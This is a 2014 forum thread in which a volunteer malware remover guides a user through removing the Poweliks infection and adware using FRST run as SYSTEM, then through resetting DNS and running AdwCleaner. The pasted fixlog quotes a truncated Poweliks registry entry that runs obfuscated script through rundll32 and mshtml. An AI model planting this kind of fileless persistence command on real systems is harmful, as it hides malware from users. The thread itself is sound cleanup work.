Quads
Malware Removalists
In New Zealand
Posts: 9,387
|
Post by Quads on Oct 22, 2014 15:11:34 GMT -8
I think I have worked out why the error message now which is fine, FRST may have taken just the smallest part of Poweliks like taking a piece out of a Jigsaw Puzzle and now it is seen as Invalid like an incomplete jigsaw puzzle if you like
Lets try this step by step,
Download the attached "Runassystem" program and have it on the infected system's Desktop AND download the same fixlist.txt as is already on this thread in previous instructions.
Now with FRST64, runassystem and fixlist all ready on the Desktop of the infected system
Start RunasSystem when it loads click the Browse Button and find FRST64 and select FRST64, Now in Runassystem's type box you will have
C:\users\[USER ACCOUNT]\Desktop\FRST64.exe
Click the OK button and Runassystem will start FRST64 but has started the program using the SYSTEM account (not a standard account or admin account.).
You can bring FRST64 to the front if runassystem is over the top.
Then Click the Fix button in FRST64, now FRST should run the script like last time BUT FRST this time is using system account rights to try and get the registry keys, some of the items for files will not be found this time.
Quads
|
|
|
Post by cobra67 on Oct 22, 2014 16:16:06 GMT -8
Please find below the output of the fixlog.txt file:
Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 22-10-2014 Ran by SYSTEM at 2014-10-22 19:12:26 Run:2 Running from C:\Users\Nancy\Desktop Loaded Profile: Nancy (Available profiles: Nancy) Boot Mode: Normal ==============================================
Content of fixlist: ***************** start HKLM-x32\...\Run: [] => [X] HKU\S-1-5-21-2134480210-3544642227-3402910462-1000\...\Run: [AdobeBridge] => [X] HKU\S-1-5-21-2134480210-3544642227-3402910462-1000\...\MountPoints2: {a17a1810-f75a-11e1-8e21-386077ec3306} - F:\iLinker.exe HKU\S-1-5-21-2134480210-3544642227-3402910462-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks! AppInit_DLLs: C:\PROGRA~2\SearchProtect\SearchProtect\bin\SPVC64Loader.dll => C:\PROGRA~2\SearchProtect\SearchProtect\bin\SPVC64Loader.dll File Not Found C:\PROGRA~2\SearchProtect\SearchProtect\bin\SPVC64Loader.dll CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION Winsock: Catalog9-x64 01 C:\Windows\system32\AdpeakProxy64.dll [439296] (Adpeak, Inc.) Winsock: Catalog9-x64 02 C:\Windows\system32\AdpeakProxy64.dll [439296] (Adpeak, Inc.) Winsock: Catalog9-x64 03 C:\Windows\system32\AdpeakProxy64.dll [439296] (Adpeak, Inc.) Winsock: Catalog9-x64 04 C:\Windows\system32\AdpeakProxy64.dll [439296] (Adpeak, Inc.) Winsock: Catalog9-x64 15 C:\Windows\system32\AdpeakProxy64.dll [439296] (Adpeak, Inc.) S2 AdpeakProxy; No ImagePath S4 CltMngSvc; C:\PROGRA~2\SearchProtect\Main\bin\CltMngSvc.exe [X] C:\PROGRA~2\SearchProtect\Main\bin\CltMngSvc.exe CustomCLSID: HKU\S-1-5-21-2134480210-3544642227-3402910462-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks? AlternateDataStreams: C:\ProgramData\Temp:D287FACF AlternateDataStreams: C:\ProgramData\Temp:D3A96964 HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AdpeakProxy => ""="service" end *****************
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => Value not found. HKU\S-1-5-21-2134480210-3544642227-3402910462-1000\Software\Microsoft\Windows\CurrentVersion\Run\\AdobeBridge => Value not found. "HKU\S-1-5-21-2134480210-3544642227-3402910462-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a17a1810-f75a-11e1-8e21-386077ec3306}" => Key not found. "HKCR\CLSID\{a17a1810-f75a-11e1-8e21-386077ec3306}" => Key not found. "HKU\S-1-5-21-2134480210-3544642227-3402910462-1000\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key Deleted Successfully. "HKU\S-1-5-21-2134480210-3544642227-3402910462-1000\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully. "C:\PROGRA~2\SearchProtect\SearchProtect\bin\SPVC64Loader.dll" => Value Data not found. "C:\PROGRA~2\SearchProtect\SearchProtect\bin\SPVC64Loader.dll" => File/Directory not found. "HKLM\SOFTWARE\Policies\Google" => Key not found. Winsock: Catalog entry 000000000001 => Deleted successfully. Winsock: Catalog entry 000000000002 => Deleted successfully. Winsock: Catalog entry 000000000003 => Deleted successfully. Winsock: Catalog entry 000000000004 => Deleted successfully. Winsock: Catalog entry 000000000015 => Not found. AdpeakProxy => Service not found. CltMngSvc => Service not found. "C:\PROGRA~2\SearchProtect\Main\bin\CltMngSvc.exe" => File/Directory not found. "HKU\S-1-5-21-2134480210-3544642227-3402910462-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key not found. "C:\ProgramData\Temp" => ":D287FACF" ADS not found. C:\ProgramData\Temp => ":D3A96964" ADS removed successfully. "HKLM\System\CurrentControlSet\Control\SafeBoot\Network\AdpeakProxy" => Key not found.
==== End of Fixlog ====
|
|
Quads
Malware Removalists
In New Zealand
Posts: 9,387
|
Post by Quads on Oct 22, 2014 16:20:37 GMT -8
We still have the DNS setting andd other PUP items to deal with BUT
The last step was to just take items and break malware apart, some go into quarantine Poweliks has been broken!!!
Now though in Normal Mode the system should be running a lot better and dllhost.exe should quieten down.
Quads
|
|
|
Post by cobra67 on Oct 22, 2014 16:25:27 GMT -8
Yay! It sure IS running better!! Thank you so much!!!
|
|
Quads
Malware Removalists
In New Zealand
Posts: 9,387
|
Post by Quads on Oct 22, 2014 16:34:54 GMT -8
I have to find the instructions I have used once before for a system that had a DNS settings similar but a different cause and IP Address.
Quads
|
|
Quads
Malware Removalists
In New Zealand
Posts: 9,387
|
Post by Quads on Oct 22, 2014 18:36:58 GMT -8
Windows 7 or Vista
a) Go to Control Panel. b) Open up Network and Internet (view by category) and Network and Sharing Center (view by small or large icons). C) Click on Local Area Connection. d) Click the Properties button. e) Select "Internet Protocol Version 4 (TCP/IPv4)" and click Properties button. F) In the properties window you will see a few radio boxes. Select "Obtain an IP address automatically" and " Obtain DNS server address automatically" and click OK to use your ISP as your default DNS. (you may want to make sure the Prefered DNS server and Alternate DNS Server boxes are empty first before you click Obtain DNS server address automaticallyThe change may not take effect until you next connect to the Internet / start Windows. Quads
|
|
|
Post by cobra67 on Oct 22, 2014 19:13:08 GMT -8
I've made the changes as requested and have rebooted my PC.
|
|
Quads
Malware Removalists
In New Zealand
Posts: 9,387
|
Post by Quads on Oct 22, 2014 19:21:29 GMT -8
Now we will go looking for the rest of the PUP items before having FRST look at the DNS and Winsock items Read carefully
Download Adwcleaner www.bleepingcomputer.com/download/adwcleaner/ on to your desktop The Blue Download Now @bleeping Computer button and run a scan ( Scan Button). It will create a log after. Or there is a Report button, ONE SCAN ONLY
Attach or paste the log back here Quads
|
|
|
Post by cobra67 on Oct 22, 2014 19:50:18 GMT -8
I've downloaded and run the program...it is now saying "Pending. Please uncheck elements you don't want to remove". Please advise what to do next. Thank you.
|
|
|
Post by cobra67 on Oct 22, 2014 19:52:38 GMT -8
I just realized there is a "Report" button. I'll go ahead and select it. Thanks.
|
|